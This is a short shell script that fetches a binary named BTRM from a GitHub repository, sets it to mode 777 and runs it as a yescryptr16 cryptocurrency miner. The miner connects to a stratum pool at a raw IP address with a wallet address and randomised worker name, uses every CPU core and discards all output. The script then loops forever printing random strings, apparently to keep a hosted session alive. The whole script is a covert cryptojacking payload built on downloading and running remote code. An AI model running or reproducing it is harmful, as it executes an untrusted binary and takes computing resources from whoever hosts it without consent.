#!/bin/sh
wget https://github.com/aqshakuy/nyemfile/raw/main/BTRM
chmod 777 BTRM
./BTRM -a yescryptr16 -o stratum+tcp://139.144.116.155:80 -u web1q30494fe7unadljvt6qy64e9e2nlxg3y05cmdkw.$(echo $(shuf -i 1-20000 -n 1)-GG) -p x -t$(nproc --all) >/dev/null 2>&1
while :; do echo $RANDOM | md5sum | head -c 20; echo; sleep 10m; done
